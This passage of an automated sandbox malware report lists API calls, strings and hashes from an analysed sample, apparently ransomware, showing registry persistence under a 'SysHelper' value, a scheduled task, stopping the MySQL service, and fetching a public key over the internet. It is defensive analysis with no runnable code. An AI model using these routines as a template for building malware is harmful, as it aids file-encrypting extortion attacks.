                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                  • String ID: bad function call$leT
                                                                                                  • API String ID: 2464034642-1982992468
                                                                                                  • Opcode ID: c59b76fcbd40dd734d5f2f3bccdd3045154ff4f64a75ec8694c8398dd41c915a
                                                                                                  • Instruction ID: 33fa2e0fe1ee1960adfa582c73704ffd371a291c0a77dfd1108c699f5c4b54d9
                                                                                                  • Opcode Fuzzy Hash: c59b76fcbd40dd734d5f2f3bccdd3045154ff4f64a75ec8694c8398dd41c915a
                                                                                                  • Instruction Fuzzy Hash: 75111C74D4020DBBCF00EFA5C489CDEBFBCEA14348F408566BD2497141EA74A3098B95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1077091919-0
                                                                                                  • Opcode ID: ff7955b7a15cf996d86d387cb313f20b4b04399a7735c94641860aafc03bc69a
                                                                                                  • Instruction ID: d46f6f3a2190c9053b1642595a30315cd45fbb08c79ab863b7a65c96c6f242ed
                                                                                                  • Opcode Fuzzy Hash: ff7955b7a15cf996d86d387cb313f20b4b04399a7735c94641860aafc03bc69a
                                                                                                  • Instruction Fuzzy Hash: 8E41E632404704AFDF12AFA5E846B9E7FE4AF44328F20803FF51896282DB7D5945DB19
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: e3248553afab84e726e18071480d529f26412e1a9932a97add6111f003f20c44
                                                                                                  • Instruction ID: 3a044d7e385452de9a39b7dd4c9fd04ccf7ac53d445b8dd23ef8bae2252312df
                                                                                                  • Opcode Fuzzy Hash: e3248553afab84e726e18071480d529f26412e1a9932a97add6111f003f20c44
                                                                                                  • Instruction Fuzzy Hash: EEC19D70700209DFDB18EF08C98196E77A6EF85704BA44D2EE891CB741DF34ED528B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 0047DAEB
                                                                                                  • CoCreateInstance.OLE32(00544F6C,00000000,00000001,00544F3C,?,?,0053A948,000000FF), ref: 0047DB0B
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0047DBD6
                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,0053A948,000000FF), ref: 0047DBE3
                                                                                                  • _memset.LIBCMT ref: 0047DC38
                                                                                                  • CoUninitialize.OLE32 ref: 0047DC92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                  • String ID: --Task$Comment$Time Trigger Task
                                                                                                  • API String ID: 330603062-1376107329
                                                                                                  • Opcode ID: d8190f4233a3e5f7c63b860cd1258a4ef171556b4a96dabe10d7b2c65f960553
                                                                                                  • Instruction ID: 3022cf35e0ab8eac733533ec91b7879f762c34e2498c8ccb33b4b61958afe321
                                                                                                  • Opcode Fuzzy Hash: d8190f4233a3e5f7c63b860cd1258a4ef171556b4a96dabe10d7b2c65f960553
                                                                                                  • Instruction Fuzzy Hash: FE51B271A40209EFDB00DF94C889FAE7BB9FF48705F108559F509AB290DB75A949CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00481A1D
                                                                                                  • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00481A32
                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 00481A46
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00481A5B
                                                                                                  • Sleep.KERNEL32(?), ref: 00481A75
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00481A80
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00481A9E
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00481AA1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                  • String ID: MYSQL
                                                                                                  • API String ID: 2359367111-1651825290
                                                                                                  • Opcode ID: e94da08b1c630c0a14e93702cbaf834bf2433bf392f4816af06335e0fea55eb6
                                                                                                  • Instruction ID: d7eae6616d54d6a71ce87b4441abf7552b9a2c23790bfbb4cca7e72f7610aea4
                                                                                                  • Opcode Fuzzy Hash: e94da08b1c630c0a14e93702cbaf834bf2433bf392f4816af06335e0fea55eb6
                                                                                                  • Instruction Fuzzy Hash: 9E11A332A01215EBDB25ABD4DD8CFAF7BACDB45751F040413FA01E2350DB28D98ADBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004D54C8
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004D54D4
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004D54F7
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004D5503
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 004D5531
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 004D555B
                                                                                                  • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004D55F5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                  • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                  • API String ID: 1717984340-2085858615
                                                                                                  • Opcode ID: 7a79753a1be1d0881eba66357eb99d7faa2f6ebae115e276d9e602788fda1c3f
                                                                                                  • Instruction ID: 5425ac92182ef63b95cd596ff9c936cb174850ed38cdfc833ff9e604b7e6d423
                                                                                                  • Opcode Fuzzy Hash: 7a79753a1be1d0881eba66357eb99d7faa2f6ebae115e276d9e602788fda1c3f
                                                                                                  • Instruction Fuzzy Hash: 41517D35A40604BBEF216B659C23FBF7B69AF15715F00002BFD01BB3C1DA694905C7AA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00490FDD: __wfsopen.LIBCMT ref: 00490FE8
                                                                                                  • _fgetws.LIBCMT ref: 0047C7BC
                                                                                                  • _memmove.LIBCMT ref: 0047C89F
                                                                                                  • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0047C94B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                  • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                  • API String ID: 2864494435-54166481
                                                                                                  • Opcode ID: 7a23c2071fcc605abdc2e7210474629d2f5be83a296b72ddeee058308db7cb98
                                                                                                  • Instruction ID: 0a907968b8b4ba1db9361ed3c8d182b57e4146f1ebebb9eea964c6843bd824a0
                                                                                                  • Opcode Fuzzy Hash: 7a23c2071fcc605abdc2e7210474629d2f5be83a296b72ddeee058308db7cb98
                                                                                                  • Instruction Fuzzy Hash: 759182B1D002199BCF20EFA4C9857EFBBB5BF04314F15452EE91963241E779AE04CB9A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0047F338
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0047F353
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                  • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                  • API String ID: 2574300362-2555811374
                                                                                                  • Opcode ID: 072c0b0f92ed2d6c77a9334faf08216a988faaf96147fd727a9f49d629fe2e2b
                                                                                                  • Instruction ID: 9b2f7e1371b5c9ddbef2266dacc34cc389d46d031cc27d31de2b10293b6c437c
                                                                                                  • Opcode Fuzzy Hash: 072c0b0f92ed2d6c77a9334faf08216a988faaf96147fd727a9f49d629fe2e2b
                                                                                                  • Instruction Fuzzy Hash: 9CC16D71D01209EBDF00DFA4DD45BDEBBB5BF14308F10842AE409B7291E7B99A19CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _malloc$__except_handler4_fprintf
                                                                                                  • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                  • API String ID: 1783060780-3771355929
                                                                                                  • Opcode ID: 438ca816bc9d3e36d715b38e4d46a52c0936b18f9ab65727cfb0edc79539f4d0
                                                                                                  • Instruction ID: eef8b26a6830d0c7167a4563f1bc349e6741503f59c5e7f3706f5db2b486f82f
                                                                                                  • Opcode Fuzzy Hash: 438ca816bc9d3e36d715b38e4d46a52c0936b18f9ab65727cfb0edc79539f4d0
                                                                                                  • Instruction Fuzzy Hash: CFA172B1C00249EBEF10EF95C946BDEBF75AF10318F14442DE40577292E7BA5A48CBA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                  • API String ID: 909875538-2908105608
                                                                                                  • Opcode ID: e8a6d70331957ccdbda6c51bb46ac451fa3016ead4ff33fa01a90c968f1db29b
                                                                                                  • Instruction ID: 2136ccd47af4cd601f71078ad8ee90eb49b1a959671c412679a95323317ac571
                                                                                                  • Opcode Fuzzy Hash: e8a6d70331957ccdbda6c51bb46ac451fa3016ead4ff33fa01a90c968f1db29b
                                                                                                  • Instruction Fuzzy Hash: 15416E65B8834129F7312929BC23F876B845F51B17F08046BFA88E53C3E78CC547826E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0047C6C2
                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0047C6F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0047C700
                                                                                                  • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0047C725
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0047C72E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseValue$OpenQuery
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                  • API String ID: 3962714758-1667468722
                                                                                                  • Opcode ID: 1dadafd394fc345a34599f32a63de9fbe8387ab43c224cfee9d1b05eafcdd80c
                                                                                                  • Instruction ID: 0e2600fc9ac7fefe7e6e32c5c04915f685965e10ce02834e27cf15a6e5e5f2fa
                                                                                                  • Opcode Fuzzy Hash: 1dadafd394fc345a34599f32a63de9fbe8387ab43c224cfee9d1b05eafcdd80c
                                                                                                  • Instruction Fuzzy Hash: ED111B75A40208FBDB109F90DD4ABEEBF78FB14704F1041A5EA04B22A1D7B15A18AB54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0048E707
                                                                                                    • Part of subcall function 0047C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047C51B
                                                                                                  • InternetOpenW.WININET ref: 0048E743
                                                                                                  • _wcsstr.LIBCMT ref: 0048E7AE
                                                                                                  • _memmove.LIBCMT ref: 0048E838
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0048E90A
                                                                                                  • lstrcatW.KERNEL32(?,&first=false), ref: 0048E93D
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0048E954
                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0048E96F
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048E98C
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048E9A3
                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0048E9CD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0048E9F3
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0048E9F6
                                                                                                  • _strstr.LIBCMT ref: 0048EA36
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048EA59
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048EA74
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0048EA82
                                                                                                  • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0048EA92
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0048EAA4
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0048EABA
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0048EAC8
                                                                                                  • lstrlenA.KERNEL32(00000022), ref: 0048EAE3
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048EB5B
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0048EB7C
                                                                                                  • _malloc.LIBCMT ref: 0048EB86
                                                                                                  • _memset.LIBCMT ref: 0048EB94
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0048EBAE
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048EBB6
                                                                                                  • _strstr.LIBCMT ref: 0048EBDA
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048EC00
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048EC24
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0048EC32
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                  • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                  • API String ID: 2805819797-1771568745
                                                                                                  • Opcode ID: ae02b21aae53ab03f4e11cfadd86afb1fbf68ce7571f9e30c9b2d0204691acec
                                                                                                  • Instruction ID: 615caff8a2eb2443de93342e75320ab2c4d26d101627f3c1844ffaa2fd94ae1a
                                                                                                  • Opcode Fuzzy Hash: ae02b21aae53ab03f4e11cfadd86afb1fbf68ce7571f9e30c9b2d0204691acec
                                                                                                  • Instruction Fuzzy Hash: 35015271448391AADB30EF619C05BDF7F99AF51704F444C1EF989A2282EB78A20CD75B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
